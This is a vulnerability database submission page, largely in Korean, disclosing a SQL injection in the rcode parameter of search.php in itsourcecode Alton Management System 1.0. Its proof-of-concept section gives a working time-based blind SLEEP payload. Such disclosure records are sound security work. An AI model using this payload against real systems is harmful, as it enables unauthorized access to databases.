제출 #381089: itsourcecode Alton Management System 1.0 SQLi search.php정보

제목itsourcecode Alton Management System 1.0 SQLi search.php
설명The rcode parameter can be passed in for querying on the "search.php" page, but due to the code's lax filtering of this parameter, it can lead to SQL injection. -------------------POC--------------- Parameter: rcode (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: rcode=1' AND (SELECT 7363 FROM (SELECT(SLEEP(5)))sBIE) AND 'vFRq'='vFRq
원천⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-1.md
사용자
 Dee.Mirage (UID 71702)
제출2024. 07. 27. PM 12:20 (2 연령 ago)
모더레이션2024. 07. 30. PM 03:29 (3 days later)
상태수락
VulDB 항목273142 [itsourcecode Alton Management System 1.0 search.php rcode SQL 주입]
포인트들20

이전개요다음

Do you need the next level of professionalism?

Upgrade your account now!